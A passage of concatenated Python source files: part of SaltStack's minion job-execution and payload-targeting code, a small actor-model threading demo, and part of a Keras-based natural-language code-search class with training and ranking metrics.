            ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
                function_name, exc
            )
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except TypeError as exc:
            msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
                function_name, exc, func.__doc__ or ''
            )
            log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
            ret['return'] = msg
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except Exception:
            msg = 'The minion function caused an exception'
            log.warning(msg, exc_info_on_loglevel=True)
            salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
            ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
    else:
        # Function is unknown: return the docs / missing-function message.
        docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
        if docs:
            docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
            ret['return'] = docs
        else:
            ret['return'] = minion_instance.functions.missing_fun_string(function_name)
            mod_name = function_name.split('.')[0]
            if mod_name in minion_instance.function_errors:
                ret['return'] += ' Possible reasons: \'{0}\''.format(
                    minion_instance.function_errors[mod_name]
                )
        ret['success'] = False
        ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        ret['out'] = 'nested'

    ret['jid'] = data['jid']
    ret['fun'] = data['fun']
    ret['fun_args'] = data['arg']
    if 'master_id' in data:
        ret['master_id'] = data['master_id']
    if 'metadata' in data:
        if isinstance(data['metadata'], dict):
            ret['metadata'] = data['metadata']
        else:
            log.warning('The metadata parameter must be a dictionary. Ignoring.')
    if minion_instance.connected:
        minion_instance._return_pub(
            ret,
            timeout=minion_instance._return_retry_timer()
        )

    # Add default returners from minion config
    # Should have been coverted to comma-delimited string already
    if isinstance(opts.get('return'), six.string_types):
        if data['ret']:
            data['ret'] = ','.join((data['ret'], opts['return']))
        else:
            data['ret'] = opts['return']

    log.debug('minion return: %s', ret)
    # TODO: make a list? Seems odd to split it this late :/
    if data['ret'] and isinstance(data['ret'], six.string_types):
        if 'ret_config' in data:
            ret['ret_config'] = data['ret_config']
        if 'ret_kwargs' in data:
            ret['ret_kwargs'] = data['ret_kwargs']
        ret['id'] = opts['id']
        for returner in set(data['ret'].split(',')):
            try:
                returner_str = '{0}.returner'.format(returner)
                if returner_str in minion_instance.returners:
                    minion_instance.returners[returner_str](ret)
                else:
                    returner_err = minion_instance.returners.missing_fun_string(returner_str)
                    log.error(
                        'Returner %s could not be loaded: %s',
                        returner_str, returner_err
                    )
            except Exception as exc:
                log.exception(
                    'The return failed for job %s: %s', data['jid'], exc
                )


def thread_multi_return(cls, minion_instance, opts, data):
    '''
    This method should be used as a threading target, start the actual
    minion side execution.
    '''
    fn_ = os.path.join(minion_instance.proc_dir, data['jid'])

    salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))

    sdata = {'pid': os.getpid()}
    sdata.update(data)
    log.info('Starting a new job with PID %s', sdata['pid'])
    # Record the job in the proc dir so it shows up as "running".
    with salt.utils.files.fopen(fn_, 'w+b') as fp_:
        fp_.write(minion_instance.serial.dumps(sdata))

    multifunc_ordered = opts.get('multifunc_ordered', False)
    num_funcs = len(data['fun'])
    # Ordered mode keys results by position; unordered mode by function name.
    if multifunc_ordered:
        ret = {
            'return': [None] * num_funcs,
            'retcode': [None] * num_funcs,
            'success': [False] * num_funcs
        }
    else:
        ret = {
            'return': {},
            'retcode': {},
            'success': {}
        }

    for ind in range(0, num_funcs):
        if not multifunc_ordered:
            ret['success'][data['fun'][ind]] = False
        try:
            minion_blackout_violation = False
            if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
                whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
                # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
                    minion_blackout_violation = True
            elif minion_instance.opts['grains'].get('minion_blackout', False):
                whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
                if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
                    minion_blackout_violation = True
            if minion_blackout_violation:
                raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
                                          'to False in pillar or grains to resume operations. Only '
                                          'saltutil.refresh_pillar allowed in blackout mode.')

            func = minion_instance.functions[data['fun'][ind]]

            args, kwargs = salt.minion.load_args_and_kwargs(
                func,
                data['arg'][ind],
                data)
            minion_instance.functions.pack['__context__']['retcode'] = 0
            key = ind if multifunc_ordered else data['fun'][ind]
            ret['return'][key] = func(*args, **kwargs)
            retcode = minion_instance.functions.pack['__context__'].get(
                'retcode',
                0
            )
            if retcode == 0:
                # No nonzero retcode in __context__ dunder. Check if return
                # is a dictionary with a "result" or "success" key.
                try:
                    func_result = all(ret['return'][key].get(x, True)
                                      for x in ('result', 'success'))
                except Exception:
                    # return data is not a dict
                    func_result = True
                if not func_result:
                    retcode = 1
            ret['retcode'][key] = retcode
            ret['success'][key] = retcode == 0
        except Exception as exc:
            trb = traceback.format_exc()
            log.warning('The minion function caused an exception: %s', exc)
            if multifunc_ordered:
                ret['return'][ind] = trb
            else:
                ret['return'][data['fun'][ind]] = trb
    ret['jid'] = data['jid']
    ret['fun'] = data['fun']
    ret['fun_args'] = data['arg']
    if 'metadata' in data:
        ret['metadata'] = data['metadata']
    if minion_instance.connected:
        minion_instance._return_pub(
            ret,
            timeout=minion_instance._return_retry_timer()
        )
    if data['ret']:
        if 'ret_config' in data:
            ret['ret_config'] = data['ret_config']
        if 'ret_kwargs' in data:
            ret['ret_kwargs'] = data['ret_kwargs']
        for returner in set(data['ret'].split(',')):
            ret['id'] = opts['id']
            try:
                minion_instance.returners['{0}.returner'.format(
                    returner
                )](ret)
            except Exception as exc:
                log.error(
                    'The return failed for job %s: %s',
                    data['jid'], exc
                )


def handle_payload(self, payload):
    '''
    Route a decrypted publication: verify it targets this minion, then hand
    it to _handle_decoded_payload.  Non-AES payloads are ignored entirely.
    '''
    if payload is not None and payload['enc'] == 'aes':
        if self._target_load(payload['load']):
            self._handle_decoded_payload(payload['load'])
        elif self.opts['zmq_filtering']:
            # In the filtering enabled case, we'd like to know when minion sees something it shouldnt
            log.trace(
                'Broadcast message received not for this minion, Load: %s',
                payload['load']
            )
    # If it's not AES, and thus has not been verified, we do nothing.
    # In the future, we could add support for some clearfuncs, but
    # the minion currently has no need.


def handle_decoded_payload(self, data):
    '''
    Override this method if you wish to handle the decoded data
    differently.
    '''
    # Ensure payload is unicode. Disregard failure to decode binary blobs.
    if six.PY2:
        data = salt.utils.data.decode(data, keep=True)
    if 'user' in data:
        log.info(
            'User %s Executing command %s with jid %s',
            data['user'], data['fun'], data['jid']
        )
    else:
        log.info(
            'Executing command %s with jid %s',
            data['fun'], data['jid']
        )
    log.debug('Command details %s', data)

    # Don't duplicate jobs
    log.trace('Started JIDs: %s', self.jid_queue)
    if self.jid_queue is not None:
        if data['jid'] in self.jid_queue:
            return
        else:
            self.jid_queue.append(data['jid'])
            if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
                self.jid_queue.pop(0)

    if isinstance(data['fun'], six.string_types):
        if data['fun'] == 'sys.reload_modules':
            self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    # NOTE(review): .get() with no default — if 'process_count_max' is absent
    # this is None and `None > 0` raises TypeError on Python 3; presumably
    # the option always has a default in opts.  TODO confirm.
    process_count_max = self.opts.get('process_count_max')
    if process_count_max > 0:
        process_count = len(salt.utils.minion.running(self.opts))
        while process_count >= process_count_max:
            log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
            yield tornado.gen.sleep(10)
            process_count = len(salt.utils.minion.running(self.opts))

    # We stash an instance references to allow for the socket
    # communication in Windows. You can't pickle functions, and thus
    # python needs to be able to reconstruct the reference on the other
    # side.
    instance = self
    multiprocessing_enabled = self.opts.get('multiprocessing', True)
    if multiprocessing_enabled:
        if sys.platform.startswith('win'):
            # let python reconstruct the minion on the other side if we're
            # running on windows
            instance = None
        with default_signals(signal.SIGINT, signal.SIGTERM):
            process = SignalHandlingProcess(
                target=self._target, args=(instance, self.opts, data, self.connected)
            )
    else:
        process = threading.Thread(
            target=self._target,
            args=(instance, self.opts, data, self.connected),
            name=data['jid']
        )

    if multiprocessing_enabled:
        with default_signals(signal.SIGINT, signal.SIGTERM):
            # Reset current signals before starting the process in
            # order not to inherit the current signal handlers
            process.start()
    else:
        process.start()
    process.name = '{}-Job-{}'.format(process.name, data['jid'])
    self.subprocess_list.add(process)


def target_load(self, load):
    '''
    Return True when the published *load* is well-formed and targets this
    minion (per its tgt_type matcher), else False.
    '''
    # Verify that the publication is valid
    if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
            or 'arg' not in load:
        return False
    # Verify that the publication applies to this minion

    # It's important to note that the master does some pre-processing
    # to determine which minions to send a request to. So for example,
    # a "salt -G 'grain_key:grain_val' test.ping" will invoke some
    # pre-processing on the master and this minion should not see the
    # publication if the master does not determine that it should.
    if 'tgt_type' in load:
        match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
        if match_func is None:
            return False
        if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
            delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
            if not match_func(load['tgt'], delimiter=delimiter):
                return False
        elif not match_func(load['tgt']):
            return False
    else:
        if not self.matchers['glob_match.match'](load['tgt']):
            return False

    return True
# ---- file: threading_actor.py ----
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu

"""
Actor model demo - an old but simple approach to parallel and distributed
computation.

- An actor is a computation task that simply executes the messages sent
  to it.
- Communication between actors is one-way and asynchronous.
"""

from queue import Queue
from threading import Thread, Event


# Sentinel used to shut an actor down: the class object itself is mailed.
class ActorExit(Exception):
    pass


class Actor:
    """Minimal actor: a mailbox drained by a daemon worker thread."""

    def __init__(self):
        self._mailbox = Queue()

    def send(self, msg):
        """Deliver a message to this actor's mailbox."""
        self._mailbox.put(msg)

    def recv(self):
        """Take the next message; raise ActorExit on the shutdown sentinel."""
        msg = self._mailbox.get()
        if msg is not ActorExit:
            return msg
        raise ActorExit()

    def start(self):
        """Spawn the daemon thread that runs this actor concurrently."""
        self._terminated = Event()
        worker = Thread(target=self._bootstrap)
        worker.daemon = True
        worker.start()

    def close(self):
        """Request shutdown by mailing the ActorExit sentinel."""
        self.send(ActorExit)

    def join(self):
        """Block until the actor's run loop has finished."""
        self._terminated.wait()

    def _bootstrap(self):
        # Swallow the expected shutdown signal; always flag termination so
        # join() wakes up even when run() raised something else.
        try:
            self.run()
        except ActorExit:
            pass
        finally:
            self._terminated.set()

    def run(self):
        """Default run loop; subclasses override this with real behavior."""
        while True:
            msg = self.recv()


class PrintActor(Actor):
    """Example actor that prints every message it receives."""

    def run(self):
        while True:
            msg = self.recv()
            print('get: ', msg)


def main():
    p = PrintActor()
    p.start()
    p.send('hello')
    p.send('actor')
    p.close()
    p.join()


if __name__ == '__main__':
    main()
# ---- file: codesearcher.py ----
from __future__ import print_function
import os
import sys
import random
import traceback
import pickle
from keras.optimizers import RMSprop, Adam
from scipy.stats import rankdata
import math
from math import log
from models import *
import argparse
from datashape.coretypes import real  # NOTE(review): appears unused -- confirm before removing

random.seed(42)
import threading
import tables
import configs
import codecs
import logging

logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO,
                    format="%(asctime)s: %(name)s: %(levelname)s: %(message)s")

from utils import cos_np, normalize, cos_np_for_normalized
from configs import get_config
from models import JointEmbeddingModel
from parsePython import CodeVisitor
from tables import *


class Index(IsDescription):
    """Row layout for the `/indices` table of the packed-HDF5 format.

    Each row records where a variable-length phrase starts inside the flat
    `/phrases` array (`pos`) and how many elements it spans (`length`).
    """
    pos = UInt64Col()
    length = UInt16Col()


class CodeSearcher:
    """Train/evaluate a joint code-description embedding model and run
    natural-language code search over Java and (transferred) Python corpora.
    """

    def __init__(self, conf=None):
        self.cv = CodeVisitor()
        self.py_path = "./data/pydata/"
        self.transfer_path = "./data/transfer/"
        self.py_codebase = self.load_pickle(self.py_path + "python_qid_to_code.pickle")
        #self.py_desc = self.load_pickle(self.py_path + "python_qid_to_title.pickle")
        self.py_use_codevec = self.py_path + "use_codevecs.h5"
        self.py_use_rawcode = self.py_path + "use_rawcode.pkl"
        self.py_use_token = self.py_path + "use_token.pkl"
        self.py_use_methname = self.py_path + "use_methname.pkl"
        self.py_use_apiseq = self.py_path + "use_apiseq.pkl"
        self.py_transferred_use_codevec = self.transfer_path + "py_transferred_use_codevec.h5"
        self.transfer_Xs_new = self.transfer_path + "transfer_Xs_new.h5"
        self.transfer_Xt_new = self.transfer_path + "transfer_Xt_new.h5"
        self.source_transferred_methnames = self.transfer_path + "source_transferred_methnames.h5"
        self.source_transferred_apiseqs = self.transfer_path + "source_transferred_apiseqs.h5"
        self.source_transferred_tokens = self.transfer_path + "source_transferred_tokens.h5"
        self.target_transferred_methnames = self.transfer_path + "target_transferred_methnames.h5"
        self.target_transferred_apiseqs = self.transfer_path + "target_transferred_apiseqs.h5"
        self.target_transferred_tokens = self.transfer_path + "target_transferred_tokens.h5"

        self.conf = dict() if conf is None else conf
        self.path = self.conf.get('workdir', '../data/github/codesearch/')
        self.train_params = conf.get('training_params', dict())
        self.data_params = conf.get('data_params', dict())
        self.model_params = conf.get('model_params', dict())

        self.vocab_methname = self.load_pickle(self.path + self.data_params['vocab_methname'])
        self.vocab_apiseq = self.load_pickle(self.path + self.data_params['vocab_apiseq'])
        self.vocab_tokens = self.load_pickle(self.path + self.data_params['vocab_tokens'])
        self.vocab_desc = self.load_pickle(self.path + self.data_params['vocab_desc'])

        self._eval_sets = None
        self._code_reprs = None
        self._code_base = None
        self._code_base_chunksize = 2000000

    def load_pickle(self, filename):
        """Deserialize and return the object stored in *filename*."""
        with open(filename, 'rb') as f:
            return pickle.load(f)

    ##### Data Set #####
    def load_pickle_data_chunk(self, filename, offset=0, chunk_size=-1):
        """Load a pickle and return data[offset:offset+chunk_size].

        A negative chunk_size, or a window exceeding the data length,
        returns the whole data set (matches original semantics).
        """
        data = self.load_pickle(filename)
        size = len(data)
        if chunk_size < 0 or offset + chunk_size > size:
            return data
        return data[offset:offset + chunk_size]

    def load_transferred_training_chunk(self, offset, chunk_size):
        """Load a chunk of TCA-transferred source-domain training data.

        Fix: the original read `self.transferred_methnames` (and friends),
        attributes that are never defined -> AttributeError.  The defined
        attributes are `self.source_transferred_*` (assumed intended here
        since this loads *training* data from the source domain -- confirm).
        """
        logger.debug('Loading a chunk of training data..')
        logger.debug('methname')
        chunk_methnames = self.load_hdf5(self.source_transferred_methnames, offset, chunk_size)
        logger.debug('apiseq')
        chunk_apiseqs = self.load_hdf5(self.source_transferred_apiseqs, offset, chunk_size)
        logger.debug('tokens')
        chunk_tokens = self.load_hdf5(self.source_transferred_tokens, offset, chunk_size)
        logger.debug('desc')
        chunk_descs = self.load_hdf5(self.path + self.data_params['train_desc'], offset, chunk_size)
        return chunk_methnames, chunk_apiseqs, chunk_tokens, chunk_descs

    def load_training_data_chunk(self, offset, chunk_size):
        """Load one chunk of (methnames, apiseqs, tokens, descs) for training."""
        logger.debug('Loading a chunk of training data..')
        logger.debug('methname')
        chunk_methnames = self.load_hdf5(self.path + self.data_params['train_methname'], offset, chunk_size)
        logger.debug('apiseq')
        chunk_apiseqs = self.load_hdf5(self.path + self.data_params['train_apiseq'], offset, chunk_size)
        logger.debug('tokens')
        chunk_tokens = self.load_hdf5(self.path + self.data_params['train_tokens'], offset, chunk_size)
        logger.debug('desc')
        chunk_descs = self.load_hdf5(self.path + self.data_params['train_desc'], offset, chunk_size)
        return chunk_methnames, chunk_apiseqs, chunk_tokens, chunk_descs

    def load_valid_data_chunk(self, chunk_size):
        """Load the first *chunk_size* validation examples."""
        logger.debug('Loading a chunk of validation data..')
        logger.debug('methname')
        chunk_methnames = self.load_hdf5(self.path + self.data_params['valid_methname'], 0, chunk_size)
        logger.debug('apiseq')
        chunk_apiseqs = self.load_hdf5(self.path + self.data_params['valid_apiseq'], 0, chunk_size)
        logger.debug('tokens')
        chunk_tokens = self.load_hdf5(self.path + self.data_params['valid_tokens'], 0, chunk_size)
        logger.debug('desc')
        chunk_descs = self.load_hdf5(self.path + self.data_params['valid_desc'], 0, chunk_size)
        return chunk_methnames, chunk_apiseqs, chunk_tokens, chunk_descs

    def load_use_data(self):
        """Load the full 'use' (indexing-time) code features."""
        logger.info('Loading use data..')
        logger.info('methname')
        methnames = self.load_hdf5(self.path + self.data_params['use_methname'], 0, -1)
        logger.info('apiseq')
        apiseqs = self.load_hdf5(self.path + self.data_params['use_apiseq'], 0, -1)
        logger.info('tokens')
        tokens = self.load_hdf5(self.path + self.data_params['use_tokens'], 0, -1)
        return methnames, apiseqs, tokens

    def load_codebase(self):
        """Load the raw-code codebase, split into fixed-size chunks.

        codefile: text file that stores raw code, one snippet per line.
        """
        logger.info('Loading codebase (chunk size={})..'.format(self._code_base_chunksize))
        if self._code_base is None:
            codebase = []
            # use codecs to read in case of encoding problems
            codes = codecs.open(self.path + self.data_params['use_codebase']).readlines()
            for i in range(0, len(codes), self._code_base_chunksize):
                codebase.append(codes[i:i + self._code_base_chunksize])
            self._code_base = codebase

    ### Results Data ###
    def load_code_reprs(self):
        """Read code vectors (2-D array) from HDF5, chunked like the codebase."""
        logger.debug('Loading code vectors (chunk size={})..'.format(self._code_base_chunksize))
        codereprs = []
        h5f = tables.open_file(self.path + self.data_params['use_codevecs'])
        vecs = h5f.root.vecs
        for i in range(0, len(vecs), self._code_base_chunksize):
            codereprs.append(vecs[i:i + self._code_base_chunksize])
        h5f.close()
        self._code_reprs = codereprs
        return self._code_reprs

    def save_code_reprs(self, vecs, filename):
        """Write a 2-D array of code vectors to *filename* as /vecs (blosc)."""
        npvecs = np.array(vecs)
        fvec = tables.open_file(filename, 'w')
        atom = tables.Atom.from_dtype(npvecs.dtype)
        filters = tables.Filters(complib='blosc', complevel=5)
        ds = fvec.create_carray(fvec.root, 'vecs', atom, npvecs.shape, filters=filters)
        ds[:] = npvecs
        fvec.close()

    def load_hdf5(self, vecfile, start_offset, chunk_size):
        """Read sentences (list of float32 arrays) from a packed HDF5 file.

        The file stores a flat `/phrases` array plus an `/indices` table of
        (pos, length) rows; reads wrap around to index 0 when the requested
        window runs past the end.  chunk_size == -1 loads everything.
        """
        table = tables.open_file(vecfile)
        data, index = (table.get_node('/phrases'), table.get_node('/indices'))
        data_len = index.shape[0]
        if chunk_size == -1:  # load all data
            chunk_size = data_len
        start_offset = start_offset % data_len
        offset = start_offset
        logger.debug("{} entries".format(data_len))
        logger.debug("starting from offset {} to {}".format(start_offset, start_offset + chunk_size))
        sents = []
        while offset < start_offset + chunk_size:
            if offset >= data_len:
                logger.warning('Warning: offset exceeds data length, starting from index 0..')
                chunk_size = start_offset + chunk_size - data_len
                start_offset = 0
                offset = 0
            # renamed from `len`/`pos` to avoid shadowing the builtin
            length, pos = index[offset]['length'], index[offset]['pos']
            offset += 1
            sents.append(data[pos:pos + length].astype('float32'))
        table.close()
        return sents

    ##### Converting / reverting #####
    def convert(self, vocab, words):
        """Convert words into vocabulary indices (0 = unknown)."""
        if type(words) == str:
            words = words.strip().lower().split(' ')
        return [vocab.get(w, 0) for w in words]

    def revert(self, vocab, indices):
        """Revert indices into words ('UNK' for unknown indices)."""
        ivocab = dict((v, k) for k, v in vocab.items())
        return [ivocab.get(i, 'UNK') for i in indices]

    ##### Padding #####
    def pad(self, data, len=None):
        """Post-pad/truncate sequences to length *len*.

        NOTE: the parameter name `len` shadows the builtin but is kept for
        backward compatibility with keyword callers.
        """
        from keras.preprocessing.sequence import pad_sequences
        return pad_sequences(data, maxlen=len, dtype="float32",
                             padding='post', truncating='post', value=0)

    ##### Model Loading / saving #####
    def save_model_epoch(self, model, epoch):
        """Save the code/desc sub-model weights for *epoch*."""
        model_dir = self.path + 'models/' + self.model_params['model_name'] + '/'
        if not os.path.exists(model_dir):
            os.makedirs(model_dir)
        model.save("{}models/{}/epo{:d}_code.h5".format(self.path, self.model_params['model_name'], epoch),
                   "{}models/{}/epo{:d}_desc.h5".format(self.path, self.model_params['model_name'], epoch),
                   overwrite=True)

    def load_model_epoch(self, model, epoch):
        """Load the code/desc sub-model weights saved for *epoch*."""
        assert os.path.exists(
            "{}models/{}/epo{:d}_code.h5".format(self.path, self.model_params['model_name'], epoch)) \
            , "Weights at epoch {:d} not found".format(epoch)
        assert os.path.exists(
            "{}models/{}/epo{:d}_desc.h5".format(self.path, self.model_params['model_name'], epoch)) \
            , "Weights at epoch {:d} not found".format(epoch)
        model.load("{}models/{}/epo{:d}_code.h5".format(self.path, self.model_params['model_name'], epoch),
                   "{}models/{}/epo{:d}_desc.h5".format(self.path, self.model_params['model_name'], epoch))

    ##### Training #####
    def train(self, model, transfer=False):
        """Train *model* chunk-by-chunk with shuffled negative descriptions.

        There shouldn't be any negative number in input_x.
        When *transfer* is True, the TCA-transferred features are used.
        """
        if self.train_params['reload'] > 0:
            self.load_model_epoch(model, self.train_params['reload'])
        valid_every = self.train_params.get('valid_every', None)
        save_every = self.train_params.get('save_every', None)
        batch_size = self.train_params.get('batch_size', 128)
        nb_epoch = self.train_params.get('nb_epoch', 10)
        split = self.train_params.get('validation_split', 0)
        val_loss = {'loss': 1., 'epoch': 0}
        logger.info("To run " + str(nb_epoch) + " times.")

        for i in range(self.train_params['reload'] + 1, nb_epoch):
            print('Epoch %d :: \n' % i, end='')
            logger.debug('loading data chunk..')
            if transfer:
                chunk_methnames, chunk_apiseqs, chunk_tokens, chunk_descs = \
                    self.load_transferred_training_chunk(
                        (i - 1) * self.train_params.get('chunk_size', 100000),
                        self.train_params.get('chunk_size', 100000))
            else:
                chunk_methnames, chunk_apiseqs, chunk_tokens, chunk_descs = \
                    self.load_training_data_chunk(
                        (i - 1) * self.train_params.get('chunk_size', 100000),
                        self.train_params.get('chunk_size', 100000))
            logger.debug('padding data..')
            chunk_padded_methnames = self.pad(chunk_methnames, self.data_params['methname_len'])
            chunk_padded_apiseqs = self.pad(chunk_apiseqs, self.data_params['apiseq_len'])
            chunk_padded_tokens = self.pad(chunk_tokens, self.data_params['tokens_len'])
            chunk_padded_good_descs = self.pad(chunk_descs, self.data_params['desc_len'])
            # negatives: the same descriptions, shuffled out of alignment
            chunk_bad_descs = [desc for desc in chunk_descs]
            random.shuffle(chunk_bad_descs)
            chunk_padded_bad_descs = self.pad(chunk_bad_descs, self.data_params['desc_len'])

            input_x = [chunk_padded_methnames, chunk_padded_apiseqs, chunk_padded_tokens,
                       chunk_padded_good_descs, chunk_padded_bad_descs]
            # NOTE(review): hist.history['val_loss'] requires validation_split > 0
            hist = model.fit(input_x, epochs=1, batch_size=batch_size, validation_split=split)

            if hist.history['val_loss'][0] < val_loss['loss']:
                val_loss = {'loss': hist.history['val_loss'][0], 'epoch': i}
            print('Best: Loss = {}, Epoch = {}'.format(val_loss['loss'], val_loss['epoch']))

            if valid_every is not None and i % valid_every == 0:
                acc1, mrr = self.valid(model, 1000, 1)

            if save_every is not None and i % save_every == 0:
                self.save_model_epoch(model, i)

    def valid(self, model, poolsize, K):
        """Quick validation in a code pool.

        param: poolsize - size of the code pool, if -1, load the whole test set
        Returns (top-1 precision, MRR).
        """
        if self._eval_sets is None:
            methnames, apiseqs, tokens, descs = self.load_valid_data_chunk(poolsize)
            self._eval_sets = dict()
            self._eval_sets['methnames'] = methnames
            self._eval_sets['apiseqs'] = apiseqs
            self._eval_sets['tokens'] = tokens
            self._eval_sets['descs'] = descs

        c_1, c_2 = 0, 0
        data_len = len(self._eval_sets['descs'])
        for i in range(data_len):
            # shuffle all descs, then plant the good one at position 0
            bad_descs = [desc for desc in self._eval_sets['descs']]
            random.shuffle(bad_descs)
            descs = bad_descs
            descs[0] = self._eval_sets['descs'][i]  # good desc
            descs = self.pad(descs, self.data_params['desc_len'])
            methnames = self.pad([self._eval_sets['methnames'][i]] * data_len, self.data_params['methname_len'])
            apiseqs = self.pad([self._eval_sets['apiseqs'][i]] * data_len, self.data_params['apiseq_len'])
            tokens = self.pad([self._eval_sets['tokens'][i]] * data_len, self.data_params['tokens_len'])
            n_good = K
            sims = model.predict([methnames, apiseqs, tokens, descs], batch_size=data_len).flatten()
            r = rankdata(sims, method='max')
            max_r = np.argmax(r)
            max_n = np.argmax(r[:n_good])
            c_1 += 1 if max_r == max_n else 0
            c_2 += 1 / float(r[max_r] - r[max_n] + 1)

        # percentage of predicted most-similar desc that really corresponds
        top1 = c_1 / float(data_len)
        mrr = c_2 / float(data_len)
        logger.info('Top-1 Precision={}, MRR={}'.format(top1, mrr))
        return top1, mrr

    ##### Evaluation in the develop set #####
    def eval(self, model, poolsize, K):
        """Validate in a code pool; return (ACC, MRR, MAP, nDCG).

        param: poolsize - size of the code pool, if -1, load the whole test set
        """
        def ACC(real, predict):
            sum = 0.0
            for val in real:
                try:
                    index = predict.index(val)
                except ValueError:
                    index = -1
                if index != -1:
                    sum = sum + 1
            return sum / float(len(real))

        def MAP(real, predict):
            sum = 0.0
            for id, val in enumerate(real):
                try:
                    index = predict.index(val)
                except ValueError:
                    index = -1
                if index != -1:
                    sum = sum + (id + 1) / float(index + 1)
            return sum / float(len(real))

        def MRR(real, predict):
            sum = 0.0
            for val in real:
                try:
                    index = predict.index(val)
                except ValueError:
                    index = -1
                if index != -1:
                    sum = sum + 1.0 / float(index + 1)
            return sum / float(len(real))

        def NDCG(real, predict):
            dcg = 0.0
            idcg = IDCG(len(real))
            for i, predictItem in enumerate(predict):
                if predictItem in real:
                    itemRelevance = 1
                    rank = i + 1
                    dcg += (math.pow(2, itemRelevance) - 1.0) * (math.log(2) / math.log(rank + 1))
            return dcg / float(idcg)

        def IDCG(n):
            idcg = 0
            itemRelevance = 1
            for i in range(n):
                idcg += (math.pow(2, itemRelevance) - 1.0) * (math.log(2) / math.log(i + 2))
            return idcg

        # load valid dataset
        if self._eval_sets is None:
            methnames, apiseqs, tokens, descs = self.load_valid_data_chunk(poolsize)
            self._eval_sets = dict()
            self._eval_sets['methnames'] = methnames
            self._eval_sets['apiseqs'] = apiseqs
            self._eval_sets['tokens'] = tokens
            self._eval_sets['descs'] = descs

        # `mean_ap` renamed from `map` to avoid shadowing the builtin
        acc, mrr, mean_ap, ndcg = 0, 0, 0, 0
        data_len = len(self._eval_sets['descs'])
        for i in range(data_len):
            print(i)
            desc = self._eval_sets['descs'][i]  # good desc
            descs = self.pad([desc] * data_len, self.data_params['desc_len'])
            methnames = self.pad(self._eval_sets['methnames'], self.data_params['methname_len'])
            apiseqs = self.pad(self._eval_sets['apiseqs'], self.data_params['apiseq_len'])
            tokens = self.pad(self._eval_sets['tokens'], self.data_params['tokens_len'])
            n_results = K
            sims = model.predict([methnames, apiseqs, tokens, descs], batch_size=data_len).flatten()
            negsims = np.negative(sims)
            predict = np.argsort(negsims)  # predict = np.argpartition(negsims, kth=n_results-1)
            predict = predict[:n_results]
            predict = [int(k) for k in predict]
            real = [i]
            acc += ACC(real, predict)
            mrr += MRR(real, predict)
            mean_ap += MAP(real, predict)
            ndcg += NDCG(real, predict)
        acc = acc / float(data_len)
        mrr = mrr / float(data_len)
        mean_ap = mean_ap / float(data_len)
        ndcg = ndcg / float(data_len)
        logger.info('ACC={}, MRR={}, MAP={}, nDCG={}'.format(acc, mrr, mean_ap, ndcg))
        return acc, mrr, mean_ap, ndcg

    ##### Compute Representation #####
    def repr_code(self, model):
        """Embed the whole 'use' corpus and persist the vectors."""
        methnames, apiseqs, tokens = self.load_use_data()
        padded_methnames = self.pad(methnames, self.data_params['methname_len'])
        padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len'])
        padded_tokens = self.pad(tokens, self.data_params['tokens_len'])
        vecs = model.repr_code([padded_methnames, padded_apiseqs, padded_tokens], batch_size=1000)
        vecs = vecs.astype('float32')
        self.save_code_reprs(vecs, self.path + self.data_params['use_codevecs'])
        return vecs

    def search(self, model, query, n_results=10):
        """Return (codes, sims): top code snippets per chunk for *query*."""
        desc = [self.convert(self.vocab_desc, query)]  # query sentence -> word indices
        padded_desc = self.pad(desc, self.data_params['desc_len'])
        desc_repr = model.repr_desc([padded_desc])
        desc_repr = desc_repr.astype('float32')

        codes = []
        sims = []
        threads = []
        for i, code_reprs_chunk in enumerate(self._code_reprs):
            t = threading.Thread(target=self.search_thread,
                                 args=(codes, sims, desc_repr, code_reprs_chunk, i, n_results))
            threads.append(t)
        for t in threads:
            t.start()
        for t in threads:  # wait until all sub-threads finish
            t.join()
        return codes, sims

    def search_thread(self, codes, sims, desc_repr, code_reprs, i, n_results):
        """Worker: rank one chunk of code vectors against the query vector."""
        # 1. compute similarity
        chunk_sims = cos_np_for_normalized(normalize(desc_repr), code_reprs)
        # 2. choose top results
        negsims = np.negative(chunk_sims[0])
        maxinds = np.argpartition(negsims, kth=n_results - 1)
        maxinds = maxinds[:n_results]
        chunk_codes = [self._code_base[i][k] for k in maxinds]
        chunk_sims = chunk_sims[0][maxinds]
        codes.extend(chunk_codes)
        sims.extend(chunk_sims)

    """
    ==================================================================
    Python Data
    """
    def load_python_codebase(self):
        """Load the raw Python codebase (pickle) as a single chunk."""
        logger.info('Loading codebase (chunk size={})..'.format(self._code_base_chunksize))
        if self._code_base is None:
            codebase = []
            codes = self.load_pickle(self.py_use_rawcode)
            codebase.append(codes)
            self._code_base = codebase

    def load_use_transferred_python_data(self):
